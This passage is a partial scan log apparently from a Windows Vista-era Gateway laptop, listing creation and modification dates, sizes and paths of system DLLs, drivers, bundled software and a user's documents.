2009-09-24 10:11 - 2009-04-11 00:28 - 000031744 _____ (Microsoft Corporation) C:\Windows\system32\bitsigd.dll
2009-09-24 10:11 - 2009-04-11 00:28 - 000019968 _____ (Microsoft Corporation) C:\Windows\system32\winrnr.dll
2009-09-24 10:11 - 2009-04-11 00:28 - 000019968 _____ (Microsoft Corporation) C:\Windows\system32\NcdProp.dll
2009-09-24 10:11 - 2009-04-11 00:28 - 000017408 _____ (Microsoft Corporation) C:\Windows\system32\vdmdbg.dll
2009-09-24 10:11 - 2009-04-11 00:28 - 000017408 _____ (Microsoft Corporation) C:\Windows\system32\midimap.dll
2009-09-24 10:11 - 2009-04-11 00:28 - 000015360 _____ (Microsoft Corporation) C:\Windows\system32\inetppui.dll
2009-09-24 10:11 - 2009-04-11 00:28 - 000012288 _____ (Microsoft Corporation) C:\Windows\system32\slwga.dll
2009-09-24 10:11 - 2009-04-11 00:27 - 000130560 _____ (Microsoft Corporation) C:\Windows\system32\PkgMgr.exe
2009-09-24 10:11 - 2009-04-11 00:27 - 000046080 _____ (Microsoft Corporation) C:\Windows\system32\csrstub.exe
2009-09-24 10:11 - 2009-04-11 00:27 - 000044032 _____ (Microsoft Corporation) C:\Windows\system32\cbsra.exe
2009-09-24 10:11 - 2009-04-11 00:22 - 000007168 _____ (Microsoft Corporation) C:\Windows\system32\f3ahvoas.dll
2009-09-24 10:11 - 2009-04-10 23:42 - 000093696 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\bridge.sys
2009-09-24 10:11 - 2009-04-10 22:46 - 000041472 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\raspppoe.sys
2009-09-24 10:11 - 2009-04-10 22:46 - 000033280 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\rndismpx.sys
2009-09-24 10:11 - 2009-04-10 22:46 - 000033280 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\RNDISMP.sys
2009-09-24 10:11 - 2009-04-10 22:42 - 000052992 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\stream.sys
2009-09-24 10:11 - 2009-04-10 22:39 - 000019456 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\Diskdump.sys
2009-09-24 10:11 - 2009-04-10 22:39 - 000016384 _____ (Microsoft Corporation) C:\Windows\system32\iscsilog.dll
2009-09-24 10:11 - 2009-04-10 22:27 - 000002560 _____ (Microsoft Corporation) C:\Windows\system32\msimsg.dll
2009-09-24 10:11 - 2009-04-10 22:23 - 000076288 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\dxg.sys
2009-09-24 10:11 - 2009-02-19 18:20 - 000009212 _____ C:\Windows\system32\RacUR.xml
2009-09-13 16:17 - 2010-05-30 10:26 - 000000007 _____ C:\Windows\system32\Class15
2009-09-13 16:17 - 2010-05-30 10:26 - 000000005 _____ C:\Windows\system32\Band4
2009-09-09 15:17 - 2009-08-14 07:49 - 000027136 _____ (Microsoft Corporation) C:\Windows\system32\NETSTAT.EXE
2009-09-09 15:17 - 2009-08-14 07:49 - 000019968 _____ (Microsoft Corporation) C:\Windows\system32\ARP.EXE
2009-09-09 15:17 - 2009-08-14 07:49 - 000017920 _____ (Microsoft Corporation) C:\Windows\system32\ROUTE.EXE
2009-09-09 15:17 - 2009-08-14 07:49 - 000011264 _____ (Microsoft Corporation) C:\Windows\system32\MRINFO.EXE
2009-09-09 15:17 - 2009-08-14 07:49 - 000010240 _____ (Microsoft Corporation) C:\Windows\system32\finger.exe
2009-09-09 15:17 - 2009-08-14 07:49 - 000009728 _____ (Microsoft Corporation) C:\Windows\system32\TCPSVCS.EXE
2009-09-09 15:17 - 2009-08-14 07:49 - 000008704 _____ (Microsoft Corporation) C:\Windows\system32\HOSTNAME.EXE
2009-09-09 15:17 - 2009-08-14 07:48 - 000105984 _____ (Microsoft Corporation) C:\Windows\system32\netiohlp.dll
2009-09-09 15:16 - 2009-07-11 13:01 - 000513536 _____ (Microsoft Corporation) C:\Windows\system32\wlansvc.dll
2009-09-09 15:16 - 2009-07-11 13:01 - 000302592 _____ (Microsoft Corporation) C:\Windows\system32\wlansec.dll
2009-09-09 15:16 - 2009-07-11 13:01 - 000293376 _____ (Microsoft Corporation) C:\Windows\system32\wlanmsm.dll
2009-09-09 15:16 - 2009-07-11 13:01 - 000065024 _____ (Microsoft Corporation) C:\Windows\system32\wlanapi.dll
2009-09-09 15:16 - 2009-07-11 11:03 - 002501921 _____ C:\Windows\system32\wlan.tmf
2009-09-09 15:16 - 2009-07-11 11:03 - 000127488 _____ (Microsoft Corporation) C:\Windows\system32\L2SecHC.dll
2009-09-09 15:16 - 2009-06-10 05:41 - 002386944 _____ (Microsoft Corporation) C:\Windows\system32\WMVCORE.DLL
2009-09-09 15:16 - 2009-04-11 00:28 - 000068096 _____ (Microsoft Corporation) C:\Windows\system32\wlanhlp.dll
2009-09-09 15:16 - 2009-04-11 00:27 - 000053248 _____ (Microsoft Corporation) C:\Windows\system32\rrinstaller.exe
2009-09-09 15:16 - 2009-04-11 00:27 - 000024576 _____ (Microsoft Corporation) C:\Windows\system32\mfpmp.exe
2009-09-09 15:16 - 2009-04-10 22:54 - 000002048 _____ (Microsoft Corporation) C:\Windows\system32\mferror.dll
2009-09-08 17:44 - 2009-09-08 17:44 - 000000000 ____D C:\ProgramData\Office Genuine Advantage
2009-09-08 14:10 - 2009-03-08 05:34 - 000208384 _____ (Microsoft Corporation) C:\Windows\system32\WinFXDocObj.exe
2009-09-08 10:07 - 2013-08-04 16:11 - 000000000 ____D C:\Users\Angela\AppData\Local\Microsoft Help
2009-08-12 10:07 - 2009-08-20 18:36 - 001268224 _____ C:\Users\Angela\Documents\vega for sheriff2.bro
2009-08-12 09:20 - 2009-07-17 07:54 - 000071680 _____ (Microsoft Corporation) C:\Windows\system32\atl.dll
2009-08-12 09:20 - 2009-06-10 05:42 - 000160256 _____ (Microsoft Corporation) C:\Windows\system32\wkssvc.dll
2009-08-12 09:20 - 2009-04-11 00:28 - 000136192 _____ (Microsoft Corporation) C:\Windows\system32\aaclient.dll
2009-08-12 09:20 - 2009-04-11 00:28 - 000053248 _____ (Microsoft Corporation) C:\Windows\system32\tsgqec.dll
2009-08-12 09:17 - 2009-06-15 08:54 - 000175104 _____ (Microsoft Corporation) C:\Windows\system32\wdigest.dll
2009-08-12 09:16 - 2009-07-15 06:39 - 000313344 _____ (Microsoft Corporation) C:\Windows\system32\wmpdxm.dll
2009-08-12 09:16 - 2009-07-15 04:21 - 000043520 _____ (Microsoft Corporation) C:\Windows\system32\msdxm.tlb
2009-08-12 09:16 - 2009-07-15 04:21 - 000018432 _____ (Microsoft Corporation) C:\Windows\system32\amcompat.tlb
2009-08-03 15:07 - 2009-08-03 15:07 - 000403816 _____ C:\Windows\system32\OGACheckControl.dll
2009-08-03 15:07 - 2009-08-03 15:07 - 000322928 _____ (Microsoft Corporation) C:\Windows\system32\OGAAddin.dll
2009-08-03 15:07 - 2009-08-03 15:07 - 000230768 _____ C:\Windows\system32\OGAEXEC.exe
2009-07-21 01:05 - 2009-07-21 01:05 - 001348432 _____ (Microsoft Corporation) C:\Windows\system32\msxml4.dll
2009-07-14 20:44 - 2018-10-30 18:06 - 000000000 ____D C:\Users\Angela\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Pogo Games
2009-07-14 20:44 - 2018-10-30 18:06 - 000000000 ____D C:\Program Files\Oberon Media
2009-07-14 20:44 - 2013-11-22 22:07 - 000000000 ____D C:\ProgramData\TEMP
2009-07-14 20:44 - 2010-02-14 20:19 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Pogo Games
2009-07-14 17:58 - 2009-07-27 17:28 - 001268224 _____ C:\Users\Angela\Documents\vega for sheriff.bro
2009-07-14 17:31 - 2009-07-14 17:31 - 000000000 ____D C:\Users\Angela\AppData\Local\Broderbund Software
2009-07-14 17:26 - 2009-07-14 17:26 - 000000000 ____D C:\ProgramData\Broderbund Software
2009-07-14 17:26 - 1998-06-18 11:33 - 000598288 _____ (Microsoft Corporation) C:\Windows\system32\temp.001
2009-07-14 17:26 - 1998-06-16 19:45 - 000077878 _____ (Microsoft Corporation) C:\Windows\system32\temp.000
2009-07-14 17:26 - 1997-01-22 07:47 - 000018192 _____ (Microsoft Corporation) C:\Windows\system32\temp.002
2009-07-14 17:26 - 1997-01-13 09:18 - 000037136 _____ (Microsoft Corporation) C:\Windows\system32\MSJINT35.DLL
2009-07-14 17:26 - 1996-12-31 13:19 - 000254976 _____ (Microsoft Corporation) C:\Windows\system32\MSEXCL35.DLL
2009-07-14 17:26 - 1996-12-31 13:19 - 000169984 _____ (Microsoft Corporation) C:\Windows\system32\MSLTUS35.DLL
2009-07-14 17:26 - 1996-12-16 10:30 - 001039360 _____ (Microsoft Corporation) C:\Windows\system32\MSJET35.DLL
2009-07-14 17:26 - 1996-12-03 13:07 - 000403216 _____ (Microsoft Corporation) C:\Windows\system32\MSREPL35.DLL
2009-07-14 17:26 - 1996-12-02 18:44 - 000290816 _____ (Microsoft Corporation) C:\Windows\system32\MSXBSE35.DLL
2009-07-14 17:26 - 1996-12-02 18:44 - 000253952 _____ (Microsoft Corporation) C:\Windows\system32\MSPDOX35.DLL
2009-07-14 17:26 - 1996-12-02 18:44 - 000166912 _____ (Microsoft Corporation) C:\Windows\system32\MSTEXT35.DLL
2009-07-14 17:26 - 1996-12-02 10:44 - 000251664 _____ (Microsoft Corporation) C:\Windows\system32\MSRD2X35.DLL
2009-07-14 17:26 - 1996-12-02 10:44 - 000024336 _____ (Microsoft Corporation) C:\Windows\system32\MSJTER35.DLL
2009-07-14 17:26 - 1996-11-07 18:48 - 000368912 _____ (Microsoft Corporation) C:\Windows\system32\VBAR332.DLL
2009-07-14 17:25 - 2009-07-14 17:26 - 000000000 ____D C:\Program Files\Web Publish
2009-07-14 17:00 - 2018-10-30 18:49 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\The Print Shop
2009-07-14 16:59 - 2009-07-14 16:59 - 000000000 ____D C:\Program Files\Common Files\MSSoap
2009-07-14 16:59 - 2009-07-14 16:59 - 000000000 ____D C:\Program Files\Broderbund
2009-07-14 16:59 - 2001-07-30 17:40 - 000024576 _____ (Microsoft Corporation) C:\Windows\system32\msxml3a.dll
2009-07-14 16:59 - 1999-04-21 05:08 - 000029184 _____ (Blue Sky Software) C:\Windows\system32\Popup.ocx
2009-07-14 16:11 - 2009-06-15 08:52 - 000023552 _____ (Microsoft Corporation) C:\Windows\system32\lpk.dll
2009-07-14 16:11 - 2009-06-15 08:51 - 000010240 _____ (Microsoft Corporation) C:\Windows\system32\dciman32.dll
2009-06-09 22:44 - 2009-06-09 22:44 - 000000000 ____D C:\Users\Angela\AppData\LocalLow\FunWebProducts
2009-05-25 19:38 - 2012-05-26 19:00 - 000013264 _____ C:\Users\Angela\Documents\puppy list sold.xlsx
2009-05-25 00:06 - 2009-05-25 00:06 - 000000540 _____ C:\Users\Angela\Desktop\Coat Color Genetics - Shortcut.lnk
2009-05-25 00:04 - 2007-03-20 01:49 - 000000000 ____D C:\Users\Angela\Documents\Coat Color Genetics
2009-05-20 11:03 - 2010-02-02 17:13 - 000000000 ____D C:\Users\Angela\AppData\LocalLow\Google
2009-05-19 12:08 - 2009-05-19 12:08 - 000000000 ____D C:\Users\Default\AppData\Local\Microsoft Help
2009-05-19 12:08 - 2009-05-19 12:08 - 000000000 ____D C:\Users\Default User\AppData\Local\Microsoft Help
2009-05-18 22:02 - 2009-05-18 22:02 - 000000000 ____D C:\Windows\Sun
2009-05-18 18:14 - 2009-05-18 18:14 - 000000000 ____D C:\Users\Angela\AppData\Roaming\Macromedia
2009-05-18 18:10 - 2011-03-02 16:26 - 000000000 ____D C:\Users\Angela\Tracing
2009-05-18 18:00 - 2009-05-18 18:00 - 000005115 _____ C:\ProgramData\N360BUOptions.ini
2009-05-18 17:48 - 2009-05-18 17:48 - 000000000 ____D C:\Program Files\Windows Live Toolbar
2009-05-18 17:47 - 2009-05-18 17:47 - 000000000 ___HD C:\Windows\msdownld.tmp
2009-05-18 17:45 - 2009-05-18 17:45 - 000000762 _____ C:\Users\Angela\Documents\My Sharing Folders.lnk
2009-05-18 17:44 - 2011-03-31 03:04 - 000000000 ____D C:\Program Files\Windows Live
2009-05-18 17:43 - 2009-05-18 17:43 - 000000000 ____D C:\Program Files\Common Files\Windows Live
2009-05-18 17:42 - 2009-05-18 17:42 - 000000000 ____D C:\Program Files\Microsoft SQL Server Compact Edition
2009-05-18 17:18 - 2018-10-30 12:28 - 000000000 ____D C:\Program Files\Common Files\supportsoft
2009-05-13 14:38 - 2009-05-13 14:38 - 000000000 ____D C:\Users\Angela\Documents\My Received Files
2009-05-12 14:34 - 2009-05-13 14:33 - 000000000 ____D C:\Users\Angela\AppData\Roaming\Google
2009-05-10 22:05 - 2013-11-22 22:28 - 000000000 ____D C:\Users\Angela\AppData\Local\Microsoft Games
2009-04-30 20:56 - 2009-04-30 20:56 - 000000000 ____D C:\Users\Angela\AppData\Roaming\PlayFirst
2009-04-30 20:56 - 2009-04-30 20:56 - 000000000 ____D C:\ProgramData\PlayFirst
2009-04-30 17:05 - 2010-10-23 14:52 - 000000000 ____D C:\Users\Angela\Documents\OneNote Notebooks
2009-04-29 22:14 - 2009-04-29 22:14 - 000000000 ____D C:\Users\Angela\AppData\Roaming\Ludia
2009-04-29 22:14 - 2009-04-29 22:14 - 000000000 ____D C:\ProgramData\Ludia
2009-04-29 18:57 - 2009-04-29 18:57 - 000000000 ____D C:\Users\Angela\AppData\Roaming\WildTangent
2009-04-29 01:07 - 2014-10-24 10:23 - 000010240 _____ C:\Users\Angela\AppData\Local\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini
2009-04-29 00:34 - 2011-02-16 10:45 - 000091776 _____ C:\Users\Angela\AppData\Local\GDIPFONTCACHEV1.DAT
2009-04-29 00:34 - 2009-04-29 00:34 - 000000000 ____D C:\Users\Angela\Documents\My Google Gadgets
2009-04-29 00:34 - 2007-03-20 01:24 - 000000000 ____D C:\Users\Angela\AppData\Local\Google
2009-04-29 00:33 - 2009-04-29 18:59 - 000000000 ____D C:\Users\Angela\AppData\Local\VirtualStore
2009-04-29 00:33 - 2007-04-24 19:57 - 000000951 _____ C:\Users\Angela\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk
2009-04-29 00:33 - 2007-04-24 19:57 - 000000946 _____ C:\Users\Angela\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows Media Player.lnk
2009-04-29 00:33 - 2007-04-24 19:57 - 000000917 _____ C:\Users\Angela\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows Mail.lnk
2009-04-29 00:32 - 2011-03-02 18:08 - 000000000 ____D C:\ProgramData\Google
2009-04-29 00:32 - 2009-04-29 00:32 - 000000000 ____D C:\Program Files\eBay
2009-04-29 00:31 - 2014-10-03 11:57 - 000000000 ____D C:\Users\Angela
2009-04-29 00:31 - 2009-04-29 00:31 - 000000020 ___SH C:\Users\Angela\ntuser.ini
2009-04-29 00:31 - 2006-11-02 06:37 - 000000000 ____D C:\Users\Angela\AppData\Roaming\Media Center Programs
2009-03-11 22:50 - 2009-03-11 22:50 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\CyberLink Power2Go
2009-03-11 22:50 - 2009-03-11 22:50 - 000000000 ____D C:\Program Files\CyberLink
2009-03-11 22:50 - 2009-03-11 22:50 - 000000000 _____ C:\Windows\system32\Drivers\Gateway_ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ_N-A_ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ.MRK
2009-03-11 22:49 - 2009-03-11 22:49 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Gateway
2009-03-11 22:48 - 2008-06-11 12:18 - 000487424 _____ C:\Windows\system32\INT15.dll
2009-03-11 22:48 - 2008-06-11 12:13 - 000017952 _____ (Acer, Inc.) C:\Windows\system32\Drivers\int15_64.sys
2009-03-11 22:48 - 2008-06-11 12:13 - 000015392 _____ (Acer, Inc.) C:\Windows\system32\Drivers\int15.sys
2009-03-11 22:48 - 2007-03-20 00:11 - 000000000 _____ C:\Windows\system32\LogConfigTemp.xml
2009-03-11 22:47 - 2009-03-11 22:47 - 000000000 ____D C:\Program Files\GATEWAY
2009-03-11 22:46 - 2009-03-11 22:46 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Realtek USB 2.0 Card Reader Software
2009-03-11 22:46 - 2008-01-03 21:35 - 000059392 _____ (Realtek Semiconductor Corp.) C:\Windows\system32\Drivers\RTSTOR.sys
2009-03-11 22:46 - 2007-08-02 23:32 - 005631520 _____ C:\Windows\system\DriveIcon.dll
2009-03-11 22:45 - 2009-03-11 22:45 - 000000000 ____D C:\Program Files\CONEXANT
2009-03-11 22:44 - 2009-03-11 22:44 - 000016052 _____ C:\Windows\system32\results.xml
2009-03-11 22:40 - 2007-08-06 06:16 - 000003432 _____ C:\Windows\system32\USBMediaReaderPatch.vbs
2009-03-11 22:36 - 2009-03-11 22:36 - 000000000 ____D C:\Windows\system32\Lang
2009-03-11 22:36 - 2008-09-08 23:19 - 000920088 _____ (Intel® Corporation) C:\Windows\system32\igxpun.exe
2009-02-23 20:51 - 2009-04-29 00:48 - 000000049 __RSH C:\Users\Public\Documents\HBEPGUID.TXT
2009-02-23 20:34 - 2008-04-22 14:35 - 000024536 _____ C:\Windows\system32\gateway.bmp
2009-02-23 20:33 - 2009-02-23 20:34 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Gateway Documentation
2009-02-23 20:33 - 2009-02-23 20:34 - 000000000 ____D C:\book
2009-02-23 20:24 - 2009-05-18 23:33 - 000000000 ____D C:\ProgramData\WildTangent
2009-02-23 20:24 - 2009-05-18 23:30 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Gateway Games
2009-02-23 20:24 - 2009-05-18 23:30 - 000000000 ____D C:\Program Files\Gateway Games
2009-02-23 20:23 - 2018-10-30 11:03 - 000000000 ____D C:\Windows\system32\Macromed
2009-02-23 20:23 - 2008-08-12 19:27 - 000001635 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\EarthLink TotalAccess.lnk
2009-02-23 20:22 - 2009-02-23 20:23 - 000000000 ____D C:\Program Files\Preload
2009-02-23 20:22 - 2009-02-23 20:22 - 000001894 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\NetZero Internet.lnk
2009-02-23 20:20 - 2011-03-02 22:29 - 000000000 ____D C:\Program Files\Google
2009-02-23 20:15 - 2009-05-18 18:04 - 000000000 ____D C:\ProgramData\Symantec
2009-02-23 20:15 - 2007-03-20 00:34 - 000000000 ____D C:\Program Files\Common Files\Symantec Shared
2009-02-23 20:12 - 2013-08-04 16:51 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Works
2009-02-23 20:12 - 2009-06-10 01:55 - 000001018 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Works Task Launcher.lnk
2009-02-23 20:12 - 2009-02-23 20:12 - 000001924 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Office PowerPoint Viewer 2007.lnk
2009-02-23 20:12 - 2009-02-23 20:12 - 000000000 ____D C:\Program Files\Microsoft Office Suite Activation Assistant
2009-02-23 20:10 - 2013-08-04 16:51 - 000000000 ____D C:\Program Files\Microsoft Works
2009-02-23 20:10 - 2009-04-30 16:57 - 000000000 ___RD C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Office
2009-02-23 20:10 - 2009-02-27 03:42 - 000031640 _____ (Microsoft Corporation) C:\Windows\system32\msonpmon.dll
2009-02-23 20:09 - 2009-02-23 20:09 - 000000000 ____D C:\Windows\PCHEALTH
2009-02-23 20:08 - 2013-12-18 01:33 - 000000000 ____D C:\Program Files\Microsoft Office
2009-02-23 20:08 - 2009-02-23 20:08 - 000000000 __RHD C:\MSOCache
2009-02-23 20:06 - 2007-05-23 19:37 - 000011776 _____ (Chicony Electronics Co., Ltd.) C:\Windows\system32\Drivers\UVCFTR_S.SYS
2009-02-23 20:04 - 2009-02-23 20:04 - 000000000 ____D C:\Program Files\Realtek
2009-02-23 20:04 - 2008-01-25 18:46 - 000106496 _____ (Realtek Corporation ) C:\Windows\system32\Drivers\Rtlh86.sys
2009-02-23 20:03 - 2018-10-30 18:50 - 000000000 ___HD C:\Program Files\InstallShield Installation Information
2009-02-23 20:03 - 2009-03-11 22:40 - 000000000 ____D C:\Program Files\IDT
2009-02-23 20:03 - 2009-02-23 20:03 - 000000000 ____H C:\Windows\system32\Drivers\Msft_Kernel_SynTP_01000.Wdf
2009-02-23 20:03 - 2009-02-23 20:03 - 000000000 ____D C:\Program Files\Synaptics
2009-02-23 20:03 - 2007-07-26 19:50 - 000329728 _____ (IDT, Inc.) C:\Windows\system32\Drivers\stwrt.sys
2009-02-23 20:03 - 2007-07-26 19:48 - 000146944 _____ (IDT, Inc.) C:\Windows\system32\staco.dll
2009-02-23 19:57 - 2009-02-23 19:57 - 000000000 ____D C:\Program Files\Intel
2009-02-23 19:57 - 2009-02-23 19:57 - 000000000 ____D C:\Intel
2009-02-23 19:12 - 2008-05-26 22:59 - 000018904 _____ C:\Windows\system32\StructuredQuerySchemaTrivial.bin
2009-02-23 19:12 - 2007-11-08 03:04 - 011967524 _____ C:\Windows\system32\korwbrkr.lex
2009-02-23 18:58 - 2008-05-09 16:22 - 000000153 _____ C:\Windows\system32\RacUREx.xml
2009-02-23 18:45 - 2008-02-29 00:35 - 000006656 _____ (Microsoft Corporation) C:\Windows\system32\kbd106n.dll
2009-02-23 18:40 - 2009-02-23 18:40 - 000000000 ____H C:\Windows\system32\Drivers\Msft_User_WpdFs_01_00_00.Wdf
2009-02-23 18:35 - 2009-04-11 00:36 - 000333257 __RSH C:\bootmgr
2009-02-23 18:34 - 2007-01-11 03:50 - 000000023 _____ C:\Windows\system32\$Acer$.cmd
2009-02-23 18:32 - 2009-04-29 00:33 - 000000000 ___HD C:\ACER
2009-02-23 18:32 - 2007-10-31 12:36 - 002252800 _____ (Intel Corporation) C:\Windows\system32\Drivers\NETw4v32.sys
2009-02-23 18:32 - 2007-08-27 12:12 - 002777088 _____ (Intel Corporation) C:\Windows\system32\NETw4r32.dll
2009-02-23 18:32 - 2007-08-27 12:12 - 000745472 _____ (Intel Corporation) C:\Windows\system32\NETw4c32.dll
2009-02-23 18:32 - 2007-01-29 07:23 - 000386560 _____ (Conexant Systems, Inc.) C:\Windows\system32\Drivers\XAudio.exe
2009-02-23 18:32 - 2007-01-29 07:23 - 000008704 _____ (Conexant Systems, Inc.) C:\Windows\system32\Drivers\XAudio.sys
2009-02-23 18:32 - 2006-12-21 10:04 - 000144201 _____ C:\Windows\system32\Drivers\HSFProf.cty
2009-02-23 18:32 - 2006-12-21 06:50 - 000985600 _____ (Conexant Systems, Inc.) C:\Windows\system32\Drivers\HSX_DPV.sys
2009-02-23 18:32 - 2006-12-21 06:49 - 000207360 _____ (Conexant Systems, Inc.) C:\Windows\system32\Drivers\HSXHWAZL.sys
2009-02-23 18:32 - 2006-12-21 06:48 - 000659968 _____ (Conexant Systems, Inc.) C:\Windows\system32\Drivers\HSX_CNXT.sys
2009-02-23 18:32 - 2006-12-19 12:37 - 000176128 _____ (Conexant Systems, Inc.) C:\Windows\system32\UCI32M16.dll
2009-02-23 18:32 - 2006-11-17 16:22 - 000181176 _____ (Synaptics, Inc.) C:\Windows\system32\Drivers\SynTP.sys
2009-02-23 18:32 - 2006-11-17 16:19 - 000110592 _____ (Synaptics, Inc.) C:\Windows\system32\SynTPCo4.dll
2009-02-23 18:32 - 2006-11-17 15:37 - 000143360 _____ (Synaptics, Inc.) C:\Windows\system32\SynTPAPI.dll
2009-02-23 18:32 - 2006-11-17 15:28 - 000196608 _____ (Synaptics, Inc.) C:\Windows\system32\SynCtrl.dll
2009-02-23 18:32 - 2006-11-17 15:28 - 000163840 _____ (Synaptics, Inc.) C:\Windows\system32\SynCOM.dll
2009-02-23 18:32 - 2006-06-18 09:26 - 000094208 _____ (Conexant) C:\Windows\system32\mdmxsdk.dll
2009-02-23 18:32 - 2006-06-18 09:26 - 000012672 _____ (Conexant) C:\Windows\system32\Drivers\mdmxsdk.sys
2009-02-23 18:32 - 2006-03-09 12:58 - 001060424 _____ C:\Windows\system32\WdfCoInstaller01000.dll
2009-01-12 03:01 - 2008-09-08 23:19 - 000670232 _____ (Intel Corporation) C:\Windows\system32\igfxcfg.exe
2009-01-12 03:01 - 2008-09-08 23:19 - 000256536 _____ (Intel Corporation) C:\Windows\system32\igfxsrvc.exe
2009-01-12 03:01 - 2008-09-08 23:19 - 000178712 _____ (Intel Corporation) C:\Windows\system32\igfxext.exe
2009-01-12 03:01 - 2008-09-08 23:19 - 000178712 _____ (Intel Corporation) C:\Windows\system32\hkcmd.exe
2009-01-12 03:01 - 2008-09-08 23:19 - 000154136 _____ (Intel Corporation) C:\Windows\system32\igfxpers.exe
2009-01-12 03:01 - 2008-09-08 23:19 - 000150040 _____ (Intel Corporation) C:\Windows\system32\igfxtray.exe
2009-01-12 03:01 - 2008-09-02 00:36 - 000036064 _____ C:\Windows\system32\iglhxs32.vp
2009-01-12 03:01 - 2008-09-01 23:25 - 000147456 _____ C:\Windows\system32\igfxCoIn_v1554.dll
2009-01-12 03:01 - 2008-09-01 23:17 - 003379200 _____ (Intel Corporation) C:\Windows\system32\igdumd32.dll
2009-01-12 03:01 - 2008-09-01 23:17 - 002472448 _____ (Intel Corporation) C:\Windows\system32\Drivers\igdkmd32.sys
2009-01-12 03:01 - 2008-09-01 23:15 - 001498700 _____ C:\Windows\system32\igkrng400.bin
2009-01-12 03:01 - 2008-09-01 23:15 - 000536576 _____ (Intel Corporation) C:\Windows\system32\igdumdx32.dll
2009-01-12 03:01 - 2008-09-01 23:10 - 002195456 _____ (Intel Corporation) C:\Windows\system32\igd10umd32.dll
2009-01-12 03:01 - 2008-09-01 23:04 - 003878912 _____ (Intel Corporation) C:\Windows\system32\ig4icd32.dll
2009-01-12 03:01 - 2008-09-01 23:04 - 002342912 _____ (Intel Corporation) C:\Windows\system32\ig4dev32.dll
2009-01-12 03:01 - 2008-09-01 22:59 - 000270336 _____ (Intel Corporation) C:\Windows\system32\igfxrptg.lrc
2009-01-12 03:01 - 2008-09-01 22:59 - 000266240 _____ (Intel Corporation) C:\Windows\system32\igfxrrus.lrc
2009-01-12 03:01 - 2008-09-01 22:59 - 000258048 _____ (Intel Corporation) C:\Windows\system32\igfxrsve.lrc
2009-01-12 03:01 - 2008-09-01 22:59 - 000258048 _____ (Intel Corporation) C:\Windows\system32\igfxrsky.lrc
2009-01-12 03:01 - 2008-09-01 22:59 - 000253952 _____ (Intel Corporation) C:\Windows\system32\igfxrtrk.lrc
2009-01-12 03:01 - 2008-09-01 22:59 - 000253952 _____ (Intel Corporation) C:\Windows\system32\igfxrslv.lrc
2009-01-12 03:01 - 2008-09-01 22:59 - 000237568 _____ (Intel Corporation) C:\Windows\system32\igfxrtha.lrc
2009-01-12 03:01 - 2008-09-01 22:58 - 000286720 _____ (Intel Corporation) C:\Windows\system32\igfxrell.lrc
2009-01-12 03:01 - 2008-09-01 22:58 - 000278528 _____ (Intel Corporation) C:\Windows\system32\igfxrita.lrc
2009-01-12 03:01 - 2008-09-01 22:58 - 000278528 _____ (Intel Corporation) C:\Windows\system32\igfxrfra.lrc
2009-01-12 03:01 - 2008-09-01 22:58 - 000278528 _____ (Intel Corporation) C:\Windows\system32\igfxresp.lrc
2009-01-12 03:01 - 2008-09-01 22:58 - 000278528 _____ (Intel Corporation) C:\Windows\system32\igfxrdeu.lrc
2009-01-12 03:01 - 2008-09-01 22:58 - 000274432 _____ (Intel Corporation) C:\Windows\system32\igfxrnld.lrc
2009-01-12 03:01 - 2008-09-01 22:58 - 000266240 _____ (Intel Corporation) C:\Windows\system32\igfxrptb.lrc
2009-01-12 03:01 - 2008-09-01 22:58 - 000262144 _____ (Intel Corporation) C:\Windows\system32\igfxrplk.lrc
2009-01-12 03:01 - 2008-09-01 22:58 - 000262144 _____ (Intel Corporation) C:\Windows\system32\igfxrhun.lrc
2009-01-12 03:01 - 2008-09-01 22:58 - 000258048 _____ (Intel Corporation) C:\Windows\system32\igfxrfin.lrc
2009-01-12 03:01 - 2008-09-01 22:58 - 000258048 _____ (Intel Corporation) C:\Windows\system32\igfxrdan.lrc
2009-01-12 03:01 - 2008-09-01 22:58 - 000258048 _____ (Intel Corporation) C:\Windows\system32\igfxrcsy.lrc
2009-01-12 03:01 - 2008-09-01 22:58 - 000253952 _____ (Intel Corporation) C:\Windows\system32\igfxrnor.lrc
2009-01-12 03:01 - 2008-09-01 22:58 - 000229376 _____ (Intel Corporation) C:\Windows\system32\igfxrara.lrc
2009-01-12 03:01 - 2008-09-01 22:58 - 000225280 _____ (Intel Corporation) C:\Windows\system32\igfxrheb.lrc
2009-01-12 03:01 - 2008-09-01 22:58 - 000184320 _____ (Intel Corporation) C:\Windows\system32\igfxrjpn.lrc
2009-01-12 03:01 - 2008-09-01 22:58 - 000180224 _____ (Intel Corporation) C:\Windows\system32\igfxrkor.lrc
2009-01-12 03:01 - 2008-09-01 22:58 - 000155648 _____ (Intel Corporation) C:\Windows\system32\igfxrcht.lrc
2009-01-12 03:01 - 2008-09-01 22:58 - 000155648 _____ (Intel Corporation) C:\Windows\system32\igfxrchs.lrc
